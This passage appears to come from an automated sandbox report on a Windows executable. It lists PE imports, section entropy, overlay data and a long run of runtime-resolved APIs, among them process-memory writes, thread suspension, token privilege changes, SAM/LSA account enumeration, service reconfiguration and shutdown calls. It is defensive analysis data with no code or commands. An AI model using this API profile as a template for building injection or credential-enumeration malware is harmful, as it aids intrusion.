- },
- {
- "name": "OpenProcessToken",
- "address": "0x407010"
- },
- {
- "name": "LookupPrivilegeValueA",
- "address": "0x407014"
- },
- {
- "name": "RegEnumValueA",
- "address": "0x407018"
- },
- {
- "name": "RegDeleteKeyA",
- "address": "0x40701c"
- },
- {
- "name": "RegDeleteValueA",
- "address": "0x407020"
- },
- {
- "name": "RegCloseKey",
- "address": "0x407024"
- },
- {
- "name": "RegSetValueExA",
- "address": "0x407028"
- },
- {
- "name": "RegQueryValueExA",
- "address": "0x40702c"
- },
- {
- "name": "RegEnumKeyA",
- "address": "0x407030"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Create",
- "address": "0x407038"
- },
- {
- "name": "ImageList_AddMasked",
- "address": "0x40703c"
- },
- {
- "name": "ImageList_Destroy",
- "address": "0x407040"
- },
- {
- "name": null,
- "address": "0x407044"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "OleUninitialize",
- "address": "0x407284"
- },
- {
- "name": "OleInitialize",
- "address": "0x407288"
- },
- {
- "name": "CoTaskMemFree",
- "address": "0x40728c"
- },
- {
- "name": "CoCreateInstance",
- "address": "0x407290"
- }
- ],
- "dll": "ole32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0027b04c",
- "overlay": {
- "size": "0x0025b058",
- "offset": "0x00019000"
- },
- "imagebase": "0x00400000",
- "reported_checksum": "0x0027b04c",
- "icon_hash": null,
- "entrypoint": "0x004031d6",
- "timestamp": "2018-12-15 22:24:22",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00006000",
- "entropy": "6.45",
- "raw_address": "0x00000400",
- "virtual_size": "0x00005f0d",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00007000",
- "size_of_data": "0x00001400",
- "entropy": "5.00",
- "raw_address": "0x00006400",
- "virtual_size": "0x00001250",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00009000",
- "size_of_data": "0x00000400",
- "entropy": "5.13",
- "raw_address": "0x00007800",
- "virtual_size": "0x0001a818",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".ndata",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00024000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000000",
- "virtual_size": "0x00009000",
- "characteristics_raw": "0xc0000080"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0002d000",
- "size_of_data": "0x00011400",
- "entropy": "1.13",
- "raw_address": "0x00007c00",
- "virtual_size": "0x000112b8",
- "characteristics_raw": "0x40000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00007430",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x000000a0"
- },
- {
- "virtual_address": "0x0002d000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x000112b8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00272c88",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x000013d0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00007000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000298"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "3abe302b6d9a1256e6a915429af4ffd2",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 7,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "version.dll.GetFileVersionInfoA",
- "shfolder.dll.SHGetFolderPathA",
- "shlwapi.dll.#437",
- "cryptbase.dll.SystemFunction036",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "comctl32.dll.#386",
- "kernel32.dll.GetUserDefaultUILanguage",
- "shell32.dll.#680",
- "system.dll.Call",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.IsWow64Process",
- "system.dll.Int64Op",
- "kernel32.dll.SetEnvironmentVariableA",
- "kernel32.dll.Wow64EnableWow64FsRedirection",
- "ole32.dll.CoRevokeInitializeSpy",
- "comctl32.dll.#388",
- "ole32.dll.NdrOleInitializeExtension",
- "ole32.dll.CoGetClassObject",
- "ole32.dll.CoGetMarshalSizeMax",
- "ole32.dll.CoMarshalInterface",
- "ole32.dll.CoUnmarshalInterface",
- "ole32.dll.StringFromIID",
- "ole32.dll.CoGetPSClsid",
- "ole32.dll.CoTaskMemAlloc",
- "ole32.dll.CoTaskMemFree",
- "ole32.dll.CoCreateInstance",
- "ole32.dll.CoReleaseMarshalData",
- "ole32.dll.DcomChannelSetHResult",
- "oleaut32.dll.#500",
- "advapi32.dll.UnregisterTraceGuids",
- "comctl32.dll.#321",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.SetConsoleInputExeNameW",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "sechost.dll.LookupAccountNameLocalW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "kernel32.dll.HeapSetInformation",
- "sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid",
- "dwmapi.dll.DwmIsCompositionEnabled",
- "advapi32.dll.SaferIdentifyLevel",
- "advapi32.dll.SaferComputeTokenFromLevel",
- "advapi32.dll.SaferCloseLevel",
- "ole32.dll.CLSIDFromProgIDEx",
- "wscript.exe.#1",
- "sxs.dll.SxsOleAut32RedirectTypeLibrary",
- "advapi32.dll.RegOpenKeyW",
- "advapi32.dll.RegQueryValueW",
- "shell32.dll.ShellExecuteExW",
- "ole32.dll.OleInitialize",
- "ole32.dll.CreateBindCtx",
- "propsys.dll.PSCreateMemoryPropertyStore",
- "propsys.dll.PSPropertyBag_WriteDWORD",
- "ole32.dll.CoGetApartmentType",
- "ole32.dll.CoRegisterInitializeSpy",
- "comctl32.dll.#236",
- "oleaut32.dll.#6",
- "ole32.dll.CoGetMalloc",
- "propsys.dll.PSPropertyBag_ReadDWORD",
- "propsys.dll.PSPropertyBag_ReadGUID",
- "comctl32.dll.#320",
- "comctl32.dll.#324",
- "comctl32.dll.#323",
- "advapi32.dll.RegEnumKeyW",
- "advapi32.dll.OpenThreadToken",
- "ole32.dll.StringFromGUID2",
- "apphelp.dll.ApphelpCheckShellObject",
- "urlmon.dll.CreateUri",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.AcquireSRWLockShared",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockShared",
- "comctl32.dll.#328",
- "comctl32.dll.#334",
- "oleaut32.dll.#2",
- "shell32.dll.#102",
- "propsys.dll.PSPropertyBag_ReadStrAlloc",
- "ole32.dll.CoInitializeEx",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.SetEntriesInAclW",
- "ntmarta.dll.GetMartaExtensionInterface",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "advapi32.dll.IsTextUnicode",
- "comctl32.dll.#332",
- "comctl32.dll.#338",
- "ole32.dll.CoUninitialize",
- "sechost.dll.ConvertSidToStringSidW",
- "profapi.dll.#104",
- "propsys.dll.#430",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegGetValueW",
- "advapi32.dll.RegCloseKey",
- "ole32.dll.CoTaskMemRealloc",
- "propsys.dll.InitPropVariantFromStringAsVector",
- "propsys.dll.PSCoerceToCanonicalValue",
- "propsys.dll.PropVariantToStringAlloc",
- "ole32.dll.PropVariantClear",
- "ole32.dll.CoAllowSetForegroundWindow",
- "shell32.dll.SHGetFolderPathW",
- "advapi32.dll.SaferGetPolicyInformation",
- "ntdll.dll.RtlDllShutdownInProgress",
- "comctl32.dll.#329",
- "ole32.dll.OleUninitialize",
- "shell32.dll.#66",
- "comctl32.dll.#339",
- "comctl32.dll.#385",
- "comctl32.dll.#336",
- "comctl32.dll.#333",
- "linkinfo.dll.IsValidLinkInfo",
- "propsys.dll.#417",
- "propsys.dll.PSGetNameFromPropertyKey",
- "propsys.dll.PSStringFromPropertyKey",
- "propsys.dll.InitVariantFromBuffer",
- "oleaut32.dll.#9",
- "propsys.dll.PropVariantToGUID",
- "linkinfo.dll.CreateLinkInfoW",
- "user32.dll.IsCharAlphaW",
- "user32.dll.CharPrevW",
- "ntshrui.dll.GetNetResourceFromLocalPathW",
- "srvcli.dll.NetShareEnum",
- "cscapi.dll.CscNetApiGetInterface",
- "slc.dll.SLGetWindowsInformationDWORD",
- "shlwapi.dll.PathRemoveFileSpecW",
- "linkinfo.dll.DestroyLinkInfo",
- "propsys.dll.PropVariantToBoolean",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "cryptsp.dll.CryptReleaseContext",
- "advapi32.dll.GetSecurityInfo",
- "advapi32.dll.SetSecurityInfo",
- "advapi32.dll.GetSecurityDescriptorControl",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.RegEnumValueW",
- "advapi32.dll.RegQueryValueExW",
- "shlwapi.dll.UrlIsW",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "msvcrt.dll._set_error_mode",
- "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
- "kernel32.dll.FindActCtxSectionStringW",
- "kernel32.dll.GetSystemWindowsDirectoryW",
- "mscoree.dll.GetProcessExecutableHeap",
- "mscorwks.dll.DllGetClassObjectInternal",
- "mscorwks.dll.GetCLRFunction",
- "advapi32.dll.RegisterTraceGuidsW",
- "advapi32.dll.GetTraceLoggerHandle",
- "advapi32.dll.GetTraceEnableLevel",
- "advapi32.dll.GetTraceEnableFlags",
- "advapi32.dll.TraceEvent",
- "mscoree.dll.IEE",
- "mscorwks.dll.IEE",
- "mscoree.dll.GetStartupFlags",
- "mscoree.dll.GetHostConfigurationFile",
- "mscoree.dll.GetCORSystemDirectory",
- "ntdll.dll.RtlVirtualUnwind",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.AddAccessAllowedAce",
- "advapi32.dll.FreeSid",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsFree",
- "kernel32.dll.AddVectoredContinueHandler",
- "kernel32.dll.RemoveVectoredContinueHandler",
- "advapi32.dll.ConvertSidToStringSidW",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.GetWriteWatch",
- "kernel32.dll.ResetWriteWatch",
- "kernel32.dll.CreateMemoryResourceNotification",
- "kernel32.dll.QueryMemoryResourceNotification",
- "kernel32.dll.GlobalMemoryStatusEx",
- "ole32.dll.CoGetContextToken",
- "oleaut32.dll.#149",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.GetFullPathNameW",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.GetFileAttributesExW",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "kernel32.dll.lstrlen",
- "kernel32.dll.lstrlenW",
- "mscoree.dll.ND_RI2",
- "kernel32.dll.lstrcpy",
- "kernel32.dll.lstrcpyW",
- "version.dll.VerLanguageNameW",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.GetCurrentProcessId",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.AdjustTokenPrivileges",
- "kernel32.dll.OpenProcess",
- "psapi.dll.EnumProcessModules",
- "psapi.dll.GetModuleInformation",
- "psapi.dll.GetModuleBaseNameW",
- "psapi.dll.GetModuleFileNameExW",
- "kernel32.dll.GetExitCodeProcess",
- "ntdll.dll.NtQuerySystemInformation",
- "user32.dll.EnumWindows",
- "user32.dll.GetWindowThreadProcessId",
- "kernel32.dll.WerSetFlags",
- "kernel32.dll.SetThreadPreferredUILanguages",
- "kernel32.dll.GetThreadPreferredUILanguages",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.GetEnvironmentVariableW",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.CryptReleaseContext",
- "advapi32.dll.CryptCreateHash",
- "advapi32.dll.CryptDestroyHash",
- "advapi32.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "advapi32.dll.CryptImportKey",
- "advapi32.dll.CryptExportKey",
- "advapi32.dll.CryptGenKey",
- "advapi32.dll.CryptGetKeyParam",
- "advapi32.dll.CryptDestroyKey",
- "advapi32.dll.CryptVerifySignatureA",
- "advapi32.dll.CryptSignHashA",
- "advapi32.dll.CryptGetProvParam",
- "advapi32.dll.CryptGetUserKey",
- "advapi32.dll.CryptEnumProvidersA",
- "cryptsp.dll.CryptImportKey",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptGetHashParam",
- "cryptsp.dll.CryptDestroyHash",
- "cryptsp.dll.CryptDestroyKey",
- "mscoree.dll.GetTokenForVTableEntry",
- "mscoree.dll.SetTargetForVTableEntry",
- "mscoree.dll.GetTargetForVTableEntry",
- "culture.dll.ConvertLangIdToCultureName",
- "ole32.dll.CoCreateGuid",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.GetConsoleScreenBufferInfo",
- "kernel32.dll.LocalFree",
- "kernel32.dll.LocalAlloc",
- "mscoree.dll.ND_RI4",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.CheckTokenMembership",
- "kernel32.dll.GetConsoleTitleW",
- "mscorjit.dll.getJit",
- "kernel32.dll.SetConsoleTitleW",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.CreateEventW",
- "ntdll.dll.WinSqmIsOptedIn",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "shfolder.dll.SHGetFolderPathW",
- "kernel32.dll.GetACP",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.GetFileType",
- "kernel32.dll.ReadFile",
- "kernel32.dll.GetSystemInfo",
- "kernel32.dll.VirtualQuery",
- "secur32.dll.GetUserNameExW",
- "advapi32.dll.GetUserNameW",
- "kernel32.dll.ReleaseMutex",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.DeregisterEventSource",
- "advapi32.dll.ReportEventW",
- "kernel32.dll.GetLogicalDrives",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.GetVolumeInformationW",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.GetLastError",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.SetEvent",
- "ole32.dll.CoGetObjectContext",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.GetProcAddress",
- "wminet_utils.dll.ResetSecurity",
- "wminet_utils.dll.SetSecurity",
- "wminet_utils.dll.BlessIWbemServices",
- "wminet_utils.dll.BlessIWbemServicesObject",
- "wminet_utils.dll.GetPropertyHandle",
- "wminet_utils.dll.WritePropertyValue",
- "wminet_utils.dll.Clone",
- "wminet_utils.dll.VerifyClientKey",
- "wminet_utils.dll.GetQualifierSet",
- "wminet_utils.dll.Get",
- "wminet_utils.dll.Put",
- "wminet_utils.dll.Delete",
- "wminet_utils.dll.GetNames",
- "wminet_utils.dll.BeginEnumeration",
- "wminet_utils.dll.Next",
- "wminet_utils.dll.EndEnumeration",
- "wminet_utils.dll.GetPropertyQualifierSet",
- "wminet_utils.dll.GetObjectText",
- "wminet_utils.dll.SpawnDerivedClass",
- "wminet_utils.dll.SpawnInstance",
- "wminet_utils.dll.CompareTo",
- "wminet_utils.dll.GetPropertyOrigin",
- "wminet_utils.dll.InheritsFrom",
- "wminet_utils.dll.GetMethod",
- "wminet_utils.dll.PutMethod",
- "wminet_utils.dll.DeleteMethod",
- "wminet_utils.dll.BeginMethodEnumeration",
- "wminet_utils.dll.NextMethod",
- "wminet_utils.dll.EndMethodEnumeration",
- "wminet_utils.dll.GetMethodQualifierSet",
- "wminet_utils.dll.GetMethodOrigin",
- "wminet_utils.dll.QualifierSet_Get",
- "wminet_utils.dll.QualifierSet_Put",
- "wminet_utils.dll.QualifierSet_Delete",
- "wminet_utils.dll.QualifierSet_GetNames",
- "wminet_utils.dll.QualifierSet_BeginEnumeration",
- "wminet_utils.dll.QualifierSet_Next",
- "wminet_utils.dll.QualifierSet_EndEnumeration",
- "wminet_utils.dll.GetCurrentApartmentType",
- "wminet_utils.dll.GetDemultiplexedStub",
- "wminet_utils.dll.CreateInstanceEnumWmi",
- "wminet_utils.dll.CreateClassEnumWmi",
- "wminet_utils.dll.ExecQueryWmi",
- "wminet_utils.dll.ExecNotificationQueryWmi",
- "wminet_utils.dll.PutInstanceWmi",
- "wminet_utils.dll.PutClassWmi",
- "wminet_utils.dll.CloneEnumWbemClassObject",
- "wminet_utils.dll.ConnectServerWmi",
- "ole32.dll.IIDFromString",
- "ole32.dll.CoCreateFreeThreadedMarshaler",
- "oleaut32.dll.SysAllocStringLen",
- "kernel32.dll.LocaleNameToLCID",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.LCIDToLocaleName",
- "kernel32.dll.GetSystemDefaultLocaleName",
- "fastprox.dll.DllGetClassObject",
- "fastprox.dll.DllCanUnloadNow",
- "dnsapi.dll.DnsApiFree",
- "oleaut32.dll.SysFreeString",
- "oleaut32.dll.#283",
- "oleaut32.dll.#284",
- "oleaut32.dll.#7",
- "oleaut32.dll.#17",
- "oleaut32.dll.#16",
- "psapi.dll.EnumProcesses",
- "kernel32.dll.FormatMessageW",
- "kernel32.dll.GetConsoleOutputCP",
- "gdi32.dll.TranslateCharsetInfo",
- "kernel32.dll.SetConsoleTextAttribute",
- "kernel32.dll.WriteConsoleW",
- "kernel32.dll.WriteFile",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.FindClose",
- "kernel32.dll.FindNextFileW",
- "shell32.dll.SHGetFileInfo",
- "kernel32.dll.GetConsoleWindow",
- "shell32.dll.CommandLineToArgvW",
- "mscoree.dll.ND_RI8",
- "kernel32.dll.RtlMoveMemory",
- "kernel32.dll.CreateProcessW",
- "kernel32.dll.DuplicateHandle",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.GetServiceKeyNameW",
- "rpcrt4.dll.I_RpcSNCHOption",
- "advapi32.dll.GetServiceDisplayNameW",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.ChangeServiceConfigW",
- "advapi32.dll.ChangeServiceConfig2W",
- "advapi32.dll.CloseServiceHandle",
- "oleaut32.dll.GetErrorInfo",
- "oleaut32.dll.SysStringLen",
- "kernel32.dll.RegOpenKeyExW",
- "advapi32.dll.ConvertStringSidToSidW",
- "mscoree.dll.ND_RU1",
- "advapi32.dll.LsaClose",
- "advapi32.dll.LsaFreeMemory",
- "advapi32.dll.LsaOpenPolicy",
- "advapi32.dll.LsaLookupSids",
- "advapi32.dll.QueryServiceStatus",
- "advapi32.dll.StartServiceW",
- "kernel32.dll.DeleteFileW",
- "mscoree.dll.CorExitProcess",
- "mscorwks.dll.CorExitProcess",
- "ntdll.dll.EtwUnregisterTraceGuids",
- "mscorwks.dll._CorDllMain",
- "kernel32.dll.CreateActCtxW",
- "kernel32.dll.AddRefActCtx",
- "kernel32.dll.ReleaseActCtx",
- "kernel32.dll.ActivateActCtx",
- "kernel32.dll.DeactivateActCtx",
- "kernel32.dll.GetCurrentActCtx",
- "kernel32.dll.QueryActCtxW",
- "netutils.dll.NetApiBufferFree",
- "vssapi.dll.CreateWriter",
- "advapi32.dll.LookupAccountNameW",
- "samcli.dll.NetLocalGroupGetMembers",
- "samlib.dll.SamConnect",
- "rpcrt4.dll.NdrClientCall3",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingFree",
- "samlib.dll.SamOpenDomain",
- "samlib.dll.SamLookupNamesInDomain",
- "samlib.dll.SamOpenAlias",
- "samlib.dll.SamFreeMemory",
- "samlib.dll.SamCloseHandle",
- "samlib.dll.SamGetMembersInAlias",
- "samlib.dll.SamEnumerateDomainsInSamServer",
- "samlib.dll.SamLookupDomainInSamServer",
- "ole32.dll.StringFromCLSID",
- "oleaut32.dll.#4",
- "propsys.dll.VariantToPropVariant",
- "wbemcore.dll.Reinitialize",
- "wbemsvc.dll.DllGetClassObject",
- "wbemsvc.dll.DllCanUnloadNow",
- "authz.dll.AuthzInitializeContextFromToken",
- "authz.dll.AuthzInitializeObjectAccessAuditEvent2",
- "authz.dll.AuthzAccessCheck",
- "authz.dll.AuthzFreeAuditEvent",
- "authz.dll.AuthzFreeContext",
- "authz.dll.AuthzInitializeResourceManager",
- "authz.dll.AuthzFreeResourceManager",
- "rpcrt4.dll.RpcBindingCreateW",
- "rpcrt4.dll.RpcBindingBind",
- "rpcrt4.dll.I_RpcMapWin32Status",
- "advapi32.dll.EventRegister",
- "advapi32.dll.EventUnregister",
- "advapi32.dll.EventWrite",
- "kernel32.dll.RegCloseKey",
- "kernel32.dll.RegSetValueExW",
- "kernel32.dll.RegQueryValueExW",
- "wmisvc.dll.IsImproperShutdownDetected",
- "wevtapi.dll.EvtRender",
- "wevtapi.dll.EvtNext",
- "wevtapi.dll.EvtClose",
- "wevtapi.dll.EvtQuery",
- "wevtapi.dll.EvtCreateRenderContext",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.RpcBindingSetOption",
- "ole32.dll.CreateStreamOnHGlobal",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegSetValueExW",
- "kernelbase.dll.InitializeAcl",
- "kernelbase.dll.AddAce",
- "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "kernel32.dll.IsThreadAFiber",
- "kernel32.dll.OpenProcessToken",
- "kernelbase.dll.GetTokenInformation",
- "kernelbase.dll.DuplicateTokenEx",
- "kernelbase.dll.AdjustTokenPrivileges",
- "kernelbase.dll.AllocateAndInitializeSid",
- "kernelbase.dll.CheckTokenMembership",
- "kernel32.dll.SetThreadToken",
- "oleaut32.dll.#285",
- "oleaut32.dll.#286",
- "ole32.dll.CLSIDFromString",
- "oleaut32.dll.#20",
- "oleaut32.dll.#19",
- "oleaut32.dll.#25",
- "authz.dll.AuthzInitializeContextFromSid",
- "ole32.dll.CoRevertToSelf",
- "advapi32.dll.LogonUserExExW",
- "sspicli.dll.LogonUserExExW",
- "ole32.dll.CoGetCallContext",
- "ole32.dll.CoImpersonateClient",
- "ole32.dll.CoSwitchCallContext",
- "oleaut32.dll.#8",
- "oleaut32.dll.#287",
- "oleaut32.dll.#288",
- "oleaut32.dll.#289",
- "oleaut32.dll.#290",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.LsaEnumerateTrustedDomains",
- "advapi32.dll.LsaQueryInformationPolicy",
- "advapi32.dll.LsaNtStatusToWinError",
- "advapi32.dll.QueryServiceStatusEx",
- "advapi32.dll.SetSecurityDescriptorControl",
- "advapi32.dll.ConvertToAutoInheritPrivateObjectSecurity",
- "advapi32.dll.DestroyPrivateObjectSecurity",
- "advapi32.dll.AddAccessAllowedObjectAce",
- "advapi32.dll.AddAccessDeniedObjectAce",
- "advapi32.dll.AddAuditAccessObjectAce",
- "advapi32.dll.SetNamedSecurityInfoW",
- "advapi32.dll.GetNamedSecurityInfoW",
- "advapi32.dll.SetNamedSecurityInfoExW",
- "advapi32.dll.GetExplicitEntriesFromAclW",
- "advapi32.dll.GetEffectiveRightsFromAclW",
- "ws2_32.dll.#115",
- "iphlpapi.dll.GetAdaptersAddresses",
- "ws2_32.dll.getaddrinfo",
- "ws2_32.dll.freeaddrinfo",
- "ws2_32.dll.#116",
- "advapi32.dll.CreateWellKnownSid",
- "netapi32.dll.NetGroupEnum",
- "netapi32.dll.NetGroupGetInfo",
- "netapi32.dll.NetGroupSetInfo",
- "netapi32.dll.NetLocalGroupGetInfo",
- "netapi32.dll.NetLocalGroupSetInfo",
- "netapi32.dll.NetGroupGetUsers",
- "netapi32.dll.NetLocalGroupGetMembers",
- "netapi32.dll.NetLocalGroupEnum",
- "netapi32.dll.NetShareEnum",
- "netapi32.dll.NetShareGetInfo",
- "netapi32.dll.NetShareAdd",
- "netapi32.dll.NetShareEnumSticky",
- "netapi32.dll.NetShareSetInfo",
- "netapi32.dll.NetShareDel",
- "netapi32.dll.NetShareDelSticky",
- "netapi32.dll.NetShareCheck",
- "netapi32.dll.NetUserEnum",
- "netapi32.dll.NetUserGetInfo",
- "netapi32.dll.NetUserSetInfo",
- "netapi32.dll.NetApiBufferFree",
- "netapi32.dll.NetQueryDisplayInformation",
- "netapi32.dll.NetServerSetInfo",
- "netapi32.dll.NetServerGetInfo",
- "netapi32.dll.NetGetDCName",
- "netapi32.dll.NetWkstaGetInfo",
- "netapi32.dll.NetGetAnyDCName",
- "netapi32.dll.NetServerEnum",
- "netapi32.dll.NetUserModalsGet",
- "netapi32.dll.NetScheduleJobAdd",
- "netapi32.dll.NetScheduleJobDel",
- "netapi32.dll.NetScheduleJobEnum",
- "netapi32.dll.NetScheduleJobGetInfo",
- "netapi32.dll.NetUseGetInfo",
- "netapi32.dll.NetEnumerateTrustedDomains",
- "netapi32.dll.DsGetDcNameW",
- "netapi32.dll.DsRoleGetPrimaryDomainInformation",
- "netapi32.dll.DsRoleFreeMemory",
- "netapi32.dll.NetRenameMachineInDomain",
- "netapi32.dll.NetJoinDomain",
- "netapi32.dll.NetUnjoinDomain",
- "oleaut32.dll.#150",
- "samlib.dll.SamQueryInformationDomain",
- "samlib.dll.SamEnumerateAliasesInDomain",
- "samlib.dll.SamQueryInformationAlias",
- "advapi32.dll.InitiateSystemShutdownExW",
- "ole32.dll.CoInitializeSecurity",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.SetLastError",
- "kernel32.dll.GetModuleHandleExW",
- "kernel32.dll.GetCurrentThreadId",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.Thread32First",
- "kernel32.dll.OpenThread",
- "kernel32.dll.ResumeThread",
- "kernel32.dll.SuspendThread",
- "kernel32.dll.Thread32Next",
- "kernel32.dll.GetModuleHandleW",
- "kernel32.dll.FindResourceW",
- "kernel32.dll.LoadResource",
- "kernel32.dll.LoadLibraryExW",
- "kernel32.dll.WriteProcessMemory",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.LoadLibraryW",
- "kernel32.dll.ReadProcessMemory",
- "kernel32.dll.SetFilePointerEx",
- "kernel32.dll.SetStdHandle",
- "kernel32.dll.WideCharToMultiByte",
- "kernel32.dll.GetCommandLineA",
- "kernel32.dll.IsProcessorFeaturePresent",
- "kernel32.dll.HeapAlloc",
- "kernel32.dll.RtlPcToFileHeader",
- "kernel32.dll.RaiseException",
- "kernel32.dll.HeapFree",
- "kernel32.dll.IsValidCodePage",
- "kernel32.dll.GetOEMCP",
- "kernel32.dll.GetCPInfo",
